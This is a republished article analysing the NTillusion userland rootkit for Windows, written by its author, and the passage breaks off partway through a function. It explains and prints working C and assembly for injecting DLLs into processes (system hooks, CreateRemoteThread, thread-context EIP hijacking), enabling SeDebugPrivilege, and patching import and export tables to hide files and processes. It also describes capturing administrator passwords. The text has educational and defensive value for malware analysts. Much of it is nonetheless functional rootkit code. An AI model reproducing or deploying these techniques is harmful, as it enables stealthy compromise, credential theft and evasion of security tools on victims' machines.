‘Analysis of a win32 Userland Rootkit’

Summary

‘A rootkit is a program designed to control the behavior of a given machine. This is often used to hide the illegitimate presence of a backdoor and others such tools. It acts by denying the listing of certain elements when requested by the user, affecting thereby the confidence that the machine has not been compromised. Presented here an analysis of a Userland rootkit for Microsoft Windows.

Credit:

‘The information has been provided by Kdm.
The original article can be found at: http://nonenone.net/misc/NTILLUSION_fullpack.txt


Details

Introduction:
There are different kinds of rootkits. Some act at the very bases of the operating system by sitting in kernel land, under the privileged ring 0 mode. Some others run under lower privileges in ring 3 and are called user land rootkits, as they target directly the user’s applications instead of the system itself. These ring 3 rootkits have encountered a recrudescence the last years since it is somewhat more portable and polyvalent than ring 0.
As there are multiple ways to stay unseen under windows, this article has not the pretension to enumerate all existing methods. This is just a guide to understand how ring 3 rootkits work by analysing the mechanisms of one of the author created on his own: the [NTillusion rootkit] (See links in the end of the article).

The NTillusion rootkit has been designed to be able to run under the lowest privileges for a given account under windows. Indeed, it doesn’t use any administrative privilege to be able to perform its stealth as it resides directly inside processes that are owned by the current user. In a word, all the ring 3 programs that a user might use to enumerate files, processes, registry keys, and used ports are closely controlled so they won’t reveal unwanted things. Meanwhile, the rootkit silently waits for passwords, allowing the load of any device driver as soon as an administrator password is caught.
All this stuff is done in two steps. First, by injecting the rootkit’s code inside each application owned by the current user and finally, by replacing strategic functions by provided ones. Theses tricks are performed at run time against a running process rather than on hard disk on binaries since it allows to work around the windows file protection, antiviral and checksum tools as well.

Code Injection:
So altering the behavior of a process requires to break into it’s memory space in order to execute some code to do the job. Fortunately, windows performs checks to prevent an application to read or write memory of an other application without its permission. Nevertheless the windows programmers included several ways to bypass the native inter-process protection so patching other processes’ memory at runtime is a true possibility. The first step in accessing a running process is done trough the OpenProcess API. If the application possesses the correct security permissions, the function returns a handle to deal with the process, in the other case, it denies access. By triggering a proper privilege, a user may get access to a privileged process as we’ll see later. In Windows NT, a privilege is some sort of flag granted to a user that allows the user to override what would normally be a restriction to some part of the operating system. This is the bright side. But unfortunately there is also a seamy side. In fact there’s multiple ways to break into the memory space of a running process and running hostile code in it, by using documented functions of the windows API.

System Hooks:
The most known technique uses the SetWindowsHookEx function which sets a hook in the message event handler of a given application. When used as a system hook, i.e. when the hook is set for the whole userland, by relying on a code located in a dll, the operating system injects the dll into each running process matching the hook type. For example, if a WH_KEYBOARD hook is used and a key is pressed under notepad, the system will map the hook’s dll inside notepad.exe memory space. Easy as ABC…

But keep in mind that this method is (a little) secured so only processes that belong to the current user will be affected. Anyway, this is sufficient.

In practice, two components are required to set a system hook:
 * A DLL that will contain the hook filtering procedure for a given event, and of course, the code to be injected into all running processes, which represents the payload.
 * An executable that will load the DLL into memory and make it call the SetWindowsHookEx function, specifying the hook type to be implemented.
The hook is able to provide the fastest injection of the DLL into target processes is the WH_CBT hooks, designed to handle windows events (minimize, maximize, creation, etc…). One flaw with this method is that it will inject the DLL without worrying about the process it affects, so the DLL must perform a target check by calling GetModuleFileName, then decide whether or not to trigger the payload.
The typical structure of an injection by a system hook is shown below.

HHOOK hHook = NULL; /* global HHOOK var, used to save the hook handle */
HINSTANCE hDLL=NULL; /* global handle to Dll (in fact, this is DLL’s base
address in memory */

/* The HookProc callback function is called by the system. We use it for
   injection purpose only as it must exist. */
__declspec(dllexport) LRESULT CALLBACK HookProc(int nCode, WPARAM wParam,
LPARAM lParam)
{
        return CallNextHookEx( hHook, nCode, wParam, lParam);
}

/* This proc is called by the loader to make the dll set the system wide
   hook */
__declspec(dllexport) void SetHook()
{
/* Set hook and save handle for later use */
hHook = SetWindowsHookEx( WH_CBT, HookProc, hDLL, 0 );
}

The rest of the code is trivial, it involves calling SetWindowsHookEx via the SetHook() procedure that resides inside the DLL. Thus, for the hook loader, we simply load the Dll, call GetProcAddress to get the address where SetHook is mapped, then call it.

CreateRemoteThread:
Another gift for Windows coders is the CreateRemoteThread API. As its name points out, it allows the creation of a thread inside the memory space of a target process. This function was offered because the designers of Windows undoubtedly thought about debuggers designers. So they provided a range of functions for remotely reading, writing and executing code through the windows NT API. Although this is great for debuggers, it is obvious that malicious application can also take advantage of this feature.
The previous method wasn’t able to target process running under the context of another user, such as the SYSTEM account. This is also true for this method which cannot affect processes running under higher security permissions, unless the SeDebugPrivilege is set. When a process uses this privilege, it is considered by the system as being a debugger. Thereby, the system grants access to process of other users up to the SYSTEM account. However, you should not think that it leads to root compromise.
By default only administrators can enable that valuable privilege, and some process may resist against the SeDebugPrivilege using kernel tricks.
Using this privilege, any request to access a process with maximum rights is granted.

The following function activates the SeDebugPrivilege for the current process. First, it accesses current process token by calling OpenProcessToken with the appropriate rights. Then, it looks up the LUID value associated with the SE_DEBUG_NAME string defined in winnt.h by calling LookupPrivilegeValue. Finally it activates this privilege through a call to AdjustTokenPrivileges, passing it a properly filled TOKEN_PRIVILEGES structure.

int LoadSeDebugPrivilege()
{
        HANDLE hToken;
        LUID Val;
        TOKEN_PRIVILEGES tp;

        if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES
        | TOKEN_QUERY, &hToken))
                return(GetLastError());

        if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Val))
                return(GetLastError());

        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = Val;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (!AdjustTokenPrivileges(hToken, FALSE, &tp,
             sizeof (tp), NULL, NULL))
                return(GetLastError());

        CloseHandle(hToken);

        return 1;
}

Activating the SeDebugPrivilege is not necessary as long as you target a process that runs under lowers permissions or belong to the current user.
So just be sure to really need it before trying to use it. But let’s go back to the CreateRemoteThread technique.

In practice, this is how the method works:

 * First and foremost, if the target process belongs to another user, the program activates the SeDebugPrivilege.
 * Then it requests a complete handle to the process to be injected using OpenProcess.
 * Using that handle, the program is allowed to use functions affecting the remote process, i.e.: VirtualProtectEx, to change the memory access protection: read, write and execute. Namely: ReadProcessMemory, to retrieve the content of a part of the memory space WriteProcessMemory, to overwrite a part of the memory VirtualAllocEx, to allocate memory among the target process.
 * Thus, it can allocate memory and inject the function to be executed with its arguments (a void* pointing to a simple variable or a more complex structure).
 * Finally, all that remains is to execute the function in the target process context by delegating the task to CreateRemoteThread. This initiates a new thread that calls the remote functions while passing it carefully selected arguments.

Contrary to the previous method, this is clean as it affects only one process at a time. Nevertheless, a draw back is that the injected code completely loses its landmark. As it cannot rely on the .data section of the native binary anymore, the code has to be specially designed so that the asm code produced by the compiler will only use relative addresses.
Added to that, there’s no certitude that the API will be at the same address in the remote process. To counterbalance, we can use the pointer passed as a parameter to our functions to communicate the address of two fundamental API which we believe to be at the same address in the target process : LoadLibrary and GetProcAddress. Added to that, there’s methods to determine the address of an API after arriving in a process, using only the FS segment, the Process Environment Block, a few undocumented structures, and a real taste for circular double-linked lists. We’ll see these linked lists later.

Producing relocable code is a perfect exercise to learn how to bypass personal firewalls. Even though this is sometimes very useful, using it in a complex project such as a rootkit is not very convenient.
That’s why we will use another method derived from this one. Thus, rather than needing to design all your code so that it is independent of its base address, you can design a small injector that once it has been injected in the target application’s memory space, will load into that space DLL containing the actual useful code.
This may be done easily because LoadLibrary(LPCTSTR lpLibFileName) only takes one parameter that may be remotely provided to the function using the CreateRemoteThread API. So the trick is to allocate memory, inject the name of our Dll, then use CreateRemoteThread to call LoadLibraryA and pass as a parameter the address where the string containing the name of our Dll is stored.

The following function demonstrates the concept.

/* InjectDll : this function injects the DLL named DLLFile into a process
   identified by its handle hModule. This is used to inject the rootkit
   into any newly created process. (error checks stripped)
*/
int InjectDll(HANDLE hModule, char *DLLFile)
{
        int LenWrite; /* length of DLLFile string */
        char * AllocMem; /* pointer to allocated memory */
        HANDLE hThread; /* handle of newly created thread */
        DWORD Result;
        PTHREAD_START_ROUTINE Injector; /* replacement function address */
        FARPROC pLoadLibrary=NULL; /* LoadLibraryA address */

        /* Calculate the number of bytes to inject */
        LenWrite = strlen(DLLFile) + 1;

        
        /* Allocate requested memory amount for WriteProcessMemory */
        AllocMem = (char *) VirtualAllocEx(hModule,NULL, LenWrite,
                                                MEM_COMMIT,PAGE_READWRITE);
        
        /* Write DLLFile string into target process */
        WriteProcessMemory(hModule, AllocMem , DLLFile, LenWrite, NULL);

        /* Resolve LoadLibraryA address */
        pLoadLibrary = (FARPROC) fGetProcAddress(
        GetModuleHandle(‘kernel32.dll’), ‘LoadLibraryA’);

        /* Make the thread’s entry point to be LoadLibraryA */
        Injector = (PTHREAD_START_ROUTINE) pLoadLibrary;

        /* Create the thread into remote process */
        hThread = CreateRemoteThread(hModule, NULL, 0, Injector,
    (void *) AllocMem, 0, NULL);

        /* Here we may wait to do clean up */
        /* Time out : 15 seconds */
    Result = WaitForSingleObject(hThread, 15*1000);
        VirtualFreeEx(hModule, (void *) AllocMem, 0, MEM_RELEASE);
        CloseHandle(hThread);

return 1;
}

Although this method seems interesting, it is from far widespread and easy to defeat using a security driver. More over, the injected DLL will be easily noticed by any program performing basic module enumeration. Later sections offer a solution to this problem.

Manipulating thread’s context – Overview
CreateRemoteThread isn’t the only debugging API that may be used to execute code into a target process. The principle of the following technique is to reroute a program’s execution flow to malicious code injected in the program’s memory space. This involves three steps.
First, the injector chooses a thread of this process and suspends it.
Then, it injects the code to be executed in the target process memory as before, using VirtualAllocEx/WriteProcessMemory, and changes a few addresses due to changes in memory position. Next, it sets the address of the next instruction to be executed for this thread (eip register) to point to the injected code and restarts the thread. The injected code is then executed in the remote process. Finally it arranges for a jump to the next instruction that should have been executed if the program had followed its normal course, in order to resume its activity as soon as possible.

…and getting deeper:
The following lines will discuss how to implement this technique in two different cases. On the one hand, we examine the case of a process created by the injector, and on the other hand, the case of an already running one.

– Process created by the injector:
Here, the target thread is already known: we’ll use the one returned by the CreateProcess function which enables the creation of a process, in suspended mode when specifying the CREATE_SUSPENDED flag. In this mode, the process creation is stopped just before the first line of its code is reached. Optimal time for a rootkit to operate, huh?

– Process already running in memory (runtime hijacking)
On the other hand, if the process is already running, we must choose one of its threads and stop it. To do this job, we enumerate all the threads on the local machine by using CreateToolhelp32Snapshot, Thread32First, Thread32Next functions and choose the first thread we’re allowed to access via the OpenThread function.
Once the target thread ID has been found, we simply suspend it by passing the handle acquired, as explained above, to the SuspendThread function.

Generating and injecting assembly code:
Once the target thread has been suspended, the injector simply needs to write the machine code to be executed in the process’ memory space. As in previous cases, this is done by allocating memory using VirtualAllocEx, then writing it in the remote process using WriteProcessMemory. In our case, the machine code is intended to execute the LoadLibraryA function. The code appears as follows.

       pushfd ; push EFLAGS
        pushad ; push general purpose registers

        ; payload body :
        push &<dll_path> ; push the address of DLL path string
        call LoadLibraryA ; call LoadLibrary API.

        popad ; pop general purpose registers
        popfd ; pop EFLAGS
        jmp Original_Eip ; resume execution where it left off before the
                            ; hijacking

Here it is clear that the address of the dll path will change between executions as it depends on the VirtualAllocEx function, which itself will try to allocate memory wherever some is available. The same is true for the address of Original_Eip which is subject to change between executions.
Only the address of LoadLibraryA can be considered as static, and even so that is of little help because it changes according to the version of windows, service packs, and various updates. Sneaky, huh?

Triggering the payload, and returning to normal for the host process:
As the code to be executed has been placed in memory, all that remains is to execute it. This involves three steps. First, we modify the EIP register of the remote thread, which contains the address of the next instruction to be executed, and have it point the injected code. Then we call SetThreadContext to make this change to EIP into account. Finally, we resume the execution of the remote thread by calling the ResumeThread API.

These methods offer an alternative to the over popular CreateRemoteThread function which could have been hooked by a driver to protect the machine against this kind of trick. But everything has a downside. Indeed, under windows 9x/Me, there’s no alternative of VirtualAllocEx, so the memory must be browsed meticulously using the PE header to find a free zone.

According to the sections above, it seems that there is no perfect method.
Each presents advantages and drawbacks. Thus, the major advantage of system hooks is their portability from one version of windows to another, covering windows 95 to XP. The CreateRemoteThread one is to offer a method able to target precisely a single process to inject, and being easy to use. Finally, the advantage of the injection using Set/GetThreadContext and EIP hijacking is to ensure to be less used and therefore more sure than the others.
Other methods also exist to trigger the load of a given DLL inside the memory space of a target process.
By design, the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsNTCurrent VersionWindowsAppInit_DLLs key gathers the DLL to be loaded by the system inside each process relying on user32.dll. Added to that come the BHO, standing for browser help objects, that act as plugins for web-browsers, enabling the load of any sort of code.

Code interception:
Code interception routines are critical since they had to meet efficiency and speed requirements. The methods presented in this section have their own advantages and drawbacks. As for the injection techniques, there’s more than one way to do the job. The goal of the methods is to redirect another program’s function when it is loaded in memory. For the target program, everything takes place as if it had called the desired functions as usual. But in fact the call is redirected to the replacement API.
Some methods of API interception are based on features intentionally provided by the designers of the PE format to simplify the loader’s task when a module is mapped into memory. The function redirection takes place once the code we inject into the target process is executed. To understand how these methods work, a thorough understanding of the PE format is needed.

The PE Format:
The Portable Executable organizes windows executables and Dlls according to a set of rules. A lot of information is readily available in the PE header located at the very beginning of the file. When an executable is loaded into memory, its image on disk (.exe/.dll) is projected into memory and its overall structure is maintained, which makes it easy to find your way around in a process if you know its base memory address. In the PE, a lot of values are marked as being Relative Virtual Addresses (RVA), which traduces an offset from the base address of the module in memory. Thus the real memory address is equal to the sum of the process’ base address and the RVA.
The PE header, located at the base address (RVA 0), starts with the MS-DOS stub, responsible (among other things) for displaying the famous ‘This program cannot be run in DOS mode’.

/* Extracts from winnt.h.
   At Module Base Address (rva 0) : */
typedef struct _IMAGE_DOS_HEADER { /* DOS .EXE header */
    WORD e_magic; /* Magic number */
    […]
    LONG e_lfanew; /* File address of new exe header */
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

In fact, the real header is located at RVA IMAGE_DOS_HEADER->e_lfanew. It is a structure of type IMAGE_NT_HEADERS, including a signature and two structures:

/* At IMAGE_DOS_HEADER->e_lfanew : */
typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

– A structure IMAGE_FILE_HEADER, which provides information about the number of sections in the executable, the type of processor it was compiled for, etc.
– A structure IMAGE_OPTIONAL_HEADER, which contains a table of structures of type IMAGE_DATA_DIRECTORY.

/* At (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader : */
typedef struct _IMAGE_OPTIONAL_HEADER {
    WORD Magic; /* Appears to be a signature WORD of some sort. Always
   appears to be set to 0x010B. */
    […]
    DWORD NumberOfRvaAndSizes; /* The number of entries in the
    DataDirectory array (below). This value is always set to 16 by the
    current tools. */
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
/* An array of IMAGE_DATA_DIRECTORY structures. The initial array elements contain the starting RVA and sizes of important portions of the executable file. Some elements at the end of the array are currently unused. */
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

The first element of the array is always the address and size of the exported function table (if present). The second array entry is the address and size of the imported function table, and so on.

Those IMAGE_DATA_DIRECTORY directories contain the size and address of the various sections of the executable as follows.
/* At (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[x]: */
typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD VirtualAddress;
    DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

/* The different sections have a defined index in the DataDirectory
array: */
#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 /* Export Directory */
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1 /* Import Directory */
[…]

Between the PE header and the content of the first section lies the section table. It contains information about the various sections of the module : name, base address, read and write permissions (IMAGE_SCN_XXX_XXX).

At (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] is the RVA to the Import Table. Similarly, the Export Address Table RVA (if it exists) may be found at (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].
We’ll see how these tables are organised in a moment.

Redirecting the Import Address Table:
After injecting our code into the application’s memory space, it is possible to change its behavior. We use a technique called ‘API hooking’ which involves replacing the API by our own routines. The most common way to do this is to alter the import address table of a given module.
When a program is executed, its various zones are mapped into memory, and the addresses of the functions it calls are updated according to the windows version and service pack. The PE format provides a clever solution to do this update, without patching every single call. When you compile your program, each call to an external API is not directly pointing to the function’s entry point in memory. It is using a jump involving a dword pointer, whose address is among a table called the Import Address Table (IAT), since it contains the address of each imported function. At load time, the loader just needs to patch each entry of the IAT to modify the target of each call for all API.
Thus, to hijack, we simply patch the IAT to make the memory point to our code instead of the true entry point of the target API. In this way, we have total control over the application, and any subsequent calls to that function are redirected.
The concept of direct call is important, because depending on how the function is called, the redirection may not take place. This is especially the case when the call is not static, i.e. it is not resolved by the loader. This situation occurs when the call is made either using dynamic resolving (LoadLibrary/GetProcAddress), using a fixed address such as FARPROC myFunc = 0x87654, or following a resolution of the API address with the export table of the dll (EAT), as would be done by GetProcAddress.
Note that it is possible to redirect LoadLibrary and GetProcAddress to overcome a part of the problem.
When redirecting via the Import Address Table, the technique consists in modifying the zone that makes the redirection jump for a given function, to a memory area controlled by the injector. So, to modify the IAT of a remote process, we must inject our code into the target process, have it executed, and recover the address of the NTHeaders structure in order to determine the base address of the Import Table. Then we must scan the table, find the Import Address Table of the correct DLL, and patch the address of the correct API. Let us take an example. Imagine that we want to hook the MessageBoxA API. First we must find the IMAGE_IMPORT_DESCRIPTOR associated to the user32.dll, then scan the Import Address Table for that DLL. As the goal is to replace the genuine address with a new one, the only thing to do is to walk this table, perform comparison, and when found, unlock the memory protection, then patch, and finally restore the previous memory protection. This is the general idea.
In fact, this is a little more complicated since the structures aren’t that simple.
As we saw before, at (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] is the RVA to the Import Table. The Import Table is an array of IMAGE_IMPORT_DESCRIPTORs, one for each imported DLL. There’s no field indicating the number of structures in this array. Instead, the last element of the array is indicated by an IMAGE_IMPORT_DESCRIPTOR that has fields filled with NULLs.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union
    {
        DWORD Characteristics; /* This field is an offset (an RVA) to an array of pointers. Each of these pointers points to an IMAGE_ IMPORT_BY_NAME structure. 0 for terminating null import descriptor*/
        DWORD OriginalFirstThunk; /* RVA to original unbound IAT (PIMAGE_THUNK_DATA)*/
    };
    
    DWORD TimeDateStamp;
    DWORD ForwarderChain; /* This field relates to forwarding.
    Forwarding involves one DLL sending on references to one of its functions to another DLL. For example, in Windows NT, NTDLL.DLL appears to forward some of its exported functions to KERNEL32.DLL. -1 if no forwarders */
    DWORD Name; /* This is an RVA to a NULL-terminated ASCII string containing the imported DLL’s name. Common examples are ‘KERNEL32.DLL’ and ‘USER32.DLL’. */
    DWORD FirstThunk; /* This field is an offset (an RVA) to an IMAGE_THUNK_DATA union. In almost every case, the union is interpreted as a pointer to an IMAGE_IMPORT_BY_NAME structure. If the field isn’t one of these pointers, then it’s supposedly treated as an export ordinal value for the DLL that’s being imported. */
} IMAGE_IMPORT_DESCRIPTOR;

In the Import Table, there’s one IMAGE_IMPORT_DESCRIPTOR entry for each imported DLL. Each IMAGE_IMPORT_DESCRIPTOR typically points to two arrays known as the Import Address Table (IAT), and the Import Name Table (INT).
The two arrays have a dual life.
Before execution, they can contain either the ordinal of the imported API, or an RVA to an IMAGE_IMPORT_BY_NAME structure, saving the name of the imported function. There’s one entry in IAT and INT for each imported functions. Both arrays are zero terminated.

/* So before loading, the tables are arrays containing structures: */
typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD Hint; /* the best guess as to what the export ordinal for the imported function is */
    BYTE Name[1]; /* ASCII string with the name of the imported
 function. */
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;

Before loading, the Characteristics member of the union is used, pointing to an IMAGE_IMPORT_BY_NAME array.

During load time, the loader forgets about IMAGE_IMPORT_BY_NAME structures and manipulates IMAGE_THUNK_DATA. These ones are essentially the same since they can act either as pointer to IMAGE_IMPORT_BY_NAME for the Import Name Table, or as functions pointers, for the Import Address Table.

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        PBYTE ForwarderString;
        PDWORD Function;
        DWORD Ordinal;
        PIMAGE_IMPORT_BY_NAME AddressOfData;
    } u1;
} IMAGE_THUNK_DATA32;

Indeed, during load time, the table pointed by IMAGE_IMPORT_DESCRIPTOR->FirstThunk is overwritten by the loader and its IMAGE_THUNK_DATA are no longer considered as PIMAGE_IMPORT_BY_NAME, but rather as function pointers. To sum up, the Import Address Table that was containing imported functions names is replaced by an array of pointer to API addresses. On the other side, the Import Name Table stays unchanged, being an array of IMAGE_THUNK_DATA using the PIMAGE_IMPORT_BY_NAME member of the u1 union.

Before loading Import Name Table : IMAGE_IMPORT_DESCRIPTOR->Characteristics (type: IMAGE_IMPORT_BY_NAME array)
Import Address Table: IMAGE_IMPORT_DESCRIPTOR->FirstThunk (type: IMAGE_IMPORT_BY_NAME array)

After loading Import Name Table : IMAGE_IMPORT_DESCRIPTOR-> OriginalFirstThunk (type: IMAGE_THUNK_DATA array)
Import Address Table: IMAGE_IMPORT_DESCRIPTOR-> FirstThunk (type: IMAGE_THUNK_DATA array)

Now we have all the elements to set up an interception function hacking the Import Address Table.

/* A simple cast function, to get an address from a base address and a RVA, casting the whole thing */
#define MakePtr(cast, ptr, addValue ) (cast) ( (DWORD)(ptr)+(DWORD)(addValue))

/* Scan through IAT and patches target function’s entry point address It uses function name comparison instead of entry point address
   comparison because explorer handles oddly some API at load time under windows 2000. (error checks stripped)
*/
int HijackApiEx(HMODULE hLocalModule, const char *ntiDllName, const char *ntiApiName, PVOID pApiNew, PVOID *ApiOrg)
{
    /* Pointer to: */
    PIMAGE_DOS_HEADER pDOSHeader; /* DOS header */
    PIMAGE_NT_HEADERS pNTHeaders; /* NT headers */
    PIMAGE_IMPORT_DESCRIPTOR pImportDesc; /* Import Descriptor */
    PIMAGE_THUNK_DATA pIAT; /* Functions address chunk */
    PIMAGE_THUNK_DATA pINT; /* Functions names array */
    PIMAGE_IMPORT_BY_NAME pImportName; /* Function Name */
    PIMAGE_THUNK_DATA pIteratingIAT; /* Iterating pointer */
    char* DllName=NULL;
    DWORD IAT_funcAddr=0; /* Fonction’s entry point in IAT */
    DWORD GPR_funcAddr=0; /* Function entry point with GetProcAddress */
    unsigned int cFuncs=0; /* Function counter */
    DWORD dwProtect=0, dwNewProtect=0; /* Memory protection flags */
    int i=0, ret=0; /* Iteration counter, return value */
    DWORD dwBase; /* Module base address */
    
    /* Get base address */
    dwBase = (DWORD)hLocalModule;
    /* Get DOS header */
    pDOSHeader = (PIMAGE_DOS_HEADER) dwBase;
    /* Get NT headers */
    pNTHeaders = MakePtr(PIMAGE_NT_HEADERS, pDOSHeader,
        pDOSHeader->e_lfanew);
    /* Localize Import table */
    pImportDesc = MakePtr(PIMAGE_IMPORT_DESCRIPTOR, dwBase,
        pNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] .VirtualAddress);
    /* For each imported DLL */
    while(pImportDesc->Name)
    {
          /* Set up DLL name pointer */
          DllName = MakePtr(char*, dwBase, pImportDesc->Name);

          /* check if it’s the wanted dll */
          if(!_stricmp(ntiDllName, DllName))
        {
            /* Set up Import Name/Address Table pointers for this DLL */
                    pINT = MakePtr(PIMAGE_THUNK_DATA, dwBase,
                        pImportDesc->OriginalFirstThunk );
                    pIAT = MakePtr(PIMAGE_THUNK_DATA, dwBase,
                        pImportDesc->FirstThunk );
                        cFuncs = 0;
                        
                        /* Count how many entries there are in this IAT. Array is 0 terminated. (Trick used by Matt Pietrek)
            */
                        
                        pIteratingIAT = pIAT;
                        while ( pIteratingIAT->u1.Function )
                        {
                                 cFuncs++;
                                 pIteratingIAT++;
                        }
    
                        if ( cFuncs != 0 )
                        {
                          /* Scan through the IAT */
                          pIteratingIAT = pIAT;
                          while ( pIteratingIAT->u1.Function )
                          {
                                /* Check that function is imported by name */
                                if ( !IMAGE_SNAP_BY_ORDINAL( pINT->u1.Ordinal ) )
                                {
                                   pImportName = MakePtr (PIMAGE_IMPORT_BY_NAME,
                                          dwBase, pINT->u1.AddressOfData);

                                   /* Check if it’s the target API */
                                   if(!_stricmp(ntiApiName,
                                          ((char*)pImportName->Name)))
                                   {

                                        /* OK, this is the target API, save genuine
                                           API address for later use */
                                        if (ApiOrg)
                                          *ApiOrg = (void*)
                                          (pIteratingIAT->u1.Function);
                                                        
                                        /* Unlock read only memory protection */
                                        VirtualProtect((LPVOID)
                                        (&pIteratingIAT->u1.Function),
                                        sizeof(DWORD),PAGE_EXECUTE_READWRITE,
                                        &dwProtect);
                                        /* OVERWRITE API address! 🙂 */
                                        (DWORD*)pIteratingIAT->u1.Function =
                                        (DWORD*)pApiNew;
                                        /* Restore previous memory protection */
                                        VirtualProtect((LPVOID)
                                        (&pIteratingIAT->u1.Function),
                                        sizeof(DWORD),dwNewProtect,
                                        &dwProtect);
                                        return 1;
                                   } /* end ‘target check’ */
                                } /* end ‘imported by name?’ */
            
                                pIteratingIAT++; /* jump to next IAT entry */
                                pINT++; /* jump to next INT entry */
                           } /* end for each function */
                        } /* end ‘is IAT empty?’*/
           } /* end ‘target dll check’ */

           pImportDesc++; /* jump to next dll */
     } /* end while (for each DLL) */

    return ret;
}

How to use this?
For example, to hook GetProcAddress just call the function as follows:
Int result;
result = HijackApiEx((hLocalModule), ‘KERNEL32.DLL’, ‘GetProcAddress’, ((VOID*)&MyGetProcAddress), ((VOID**)&fGetProcAddress));

hLocalModule being a handle to the module whose Import Table is going to be altered, MyGetProcAddress the replacement function, and fGetProcAddress a FARPROC to call the real API without falling in the hook trap.

Redirecting the Export Address Table:
This method is from far less used than the previous one since it isn’t as useful and easy to set up. Like the other, it is based on conveniences introduced by the PE creators to speed up the task of the loader, when resolving DLL exports. References to these exports are gathered in a dedicated section labelled Export Table that associates a name or an ordinal to each exported symbol (function, variable). From this name/ordinal it is then possible to retrieve the address of the symbol inside the memory space of the loaded module.
The export section begins at RVA pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress with an IMAGE_EXPORT_DIRECTORY structure presented below.

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD Characteristics; /*Flags for the exports. Currently, none are defined. */
    DWORD TimeDateStamp; /*The time/date that the exports were
  created. */
    WORD MajorVersion; /*The major version number of the exports.*/
    WORD MinorVersion; /* minor */
    DWORD Name; /*A relative virtual address (RVA) to an ASCII string with the DLL name associated with these exports (for example, KERNEL32.DLL).*/
    DWORD Base; /*This field contains the starting ordinal value to be used for this executable’s exports.*/
    DWORD NumberOfFunctions;/*The number of entries in the EAT. Note
that some entries may be 0, indicating that no code/data is exported with that ordinal value.*/
    DWORD NumberOfNames; /*The number of entries in the Export Names Table (ENT).*/
    DWORD AddressOfFunctions; /*The RVA of the EAT.*/
    DWORD AddressOfNames; /*The RVA of the ENT */
    DWORD AddressOfNameOrdinals; /*The RVA of the export ordinal table.
*/
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

The members we’re interested in are :
AddressOfFunctions : a RVA to the so-called Export Table which is an array of entry points RVA. Each nonzero RVA in the array corresponds to an exported symbol.
AddressOfNames : a RVA to the Export Name Table which gathers RVA to ASCII strings. Each ASCII string corresponds to a symbol exported by name.
AddressOfNameOrdinals : a RVA to the Export Ordinal Table. This table of WORDS maps an array index from the Export Name Table into the corresponding export address table entry.

In practice, how does it works? Let’s say we want to recover the address of MessageBoxA by walking the Export Table of user32.dll. We start by scanning through AddressOfNames and find the function name at index X.
Then we consult the content of AddressOfNameOrdinals[X] and found the value Y. Finally we just look the content of AddressOfFunctions[Y] and found the RVA to MessageBoxA’s entry point.

In the case of hijacking, the main idea is to scan through the Export Table and overwrite the address of a function we want to replace, causing subsequent address resolution for this symbol to point to our code instead of the real one. This perfectly works against programs that perform runtime address resolution by calling GetProcAddress. In fact, this function does the same job as the loader by walking the Export Table, so foiling it is easy. Nevertheless in the case of the loader, address resolution is done even earlier we had a chance to run code inside a newly created process so faking the Export Table of a given module won’t affect the Import Table of the process. This is why Export Address Table hooking is not very efficient under windows NT/2000/XP.
However windows 9x does not map a copy of system DLLs inside the memory space of each process as NT does, but rather loads them into a space accessible by everyone (something like PAGE_EXECUTE_READ, but write access can be enforced). In this case hooking the Export Table is very effective since it will affect any newly created process.

We somewhat covered the topic so it’s time to see the code.

/*
This function returns the address of the ExportAddressTable array member
(AddressOfFunctions[x]) that olds the real API address. In other words, at the address returned, you’ll find a RVA to the API’s address in memory.
(Equivalent to GetProcAddress, apart from the fact that you have to extract the API Address yourself, but it’s useful for EAT hooking techniques)

Sample :
DWORD BaseAddr;
HINSTANCE hDll;
HDll = LoadLibrary(‘user32.dll’);
BaseAddr = (DWORD)HDll;
DWORD* p = EAT_GetPointerToApiAddress(HDll,’MessageBoxA’)

printf(‘%s real address: 0x%x (RVA+BaseAddr), stored in EAT at 0x%x’,’MessageBoxA’, *p+BaseAddr, p);

Please note that this function returns a RVA, not a complete address.
You’ll have to add the module base address.
(error checks stripped)
*/

/* Returns an offset from a RVA and a base address, casted into TYPE* */
#define RVA2OFS(Type, BaseAddr, RVA) ((Type)((DWORD)(BaseAddr) + (DWORD)(RVA)))

DWORD EAT_GetPointerToApiAddress(HMODULE hMod, char* ApiName)
{
  /* Pointer to DOS header */
  PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)hMod;
  PIMAGE_NT_HEADERS pNTHeader; /* Pointer to NT header */

  PIMAGE_EXPORT_DIRECTORY pExportDir; /* Pointer to Export Section */
